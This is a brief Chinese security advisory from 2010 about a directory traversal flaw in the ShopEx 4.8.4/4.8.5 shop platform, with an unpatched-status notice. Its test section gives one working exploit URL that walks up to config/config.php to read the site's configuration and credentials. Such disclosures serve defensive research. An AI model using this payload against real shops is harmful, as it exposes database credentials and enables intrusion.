发布日期：2010-06-29
更新日期：2010-06-30

受影响系统：

上海商派网络科技有限公司 ShopEx 4.8.5
上海商派网络科技有限公司 ShopEx 4.8.4

描述：

---

ShopEx是在国内非常流行的网上商店平台软件。

ShopEx没有正确地过滤提交给index.php页面的请求参数，远程攻击者可以通过目录遍历攻击读取指定位置上的文件。

<*来源：寂寞hacker
  
  链接：http://hi.baidu.com/isbx/blog/item/1acfc995db388a46d0135ee0.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://test.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

建议：

---

厂商补丁：

上海商派网络科技有限公司
------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.shopex.cn/index.html

浏览次数：4267
严重程度：0（网友投票）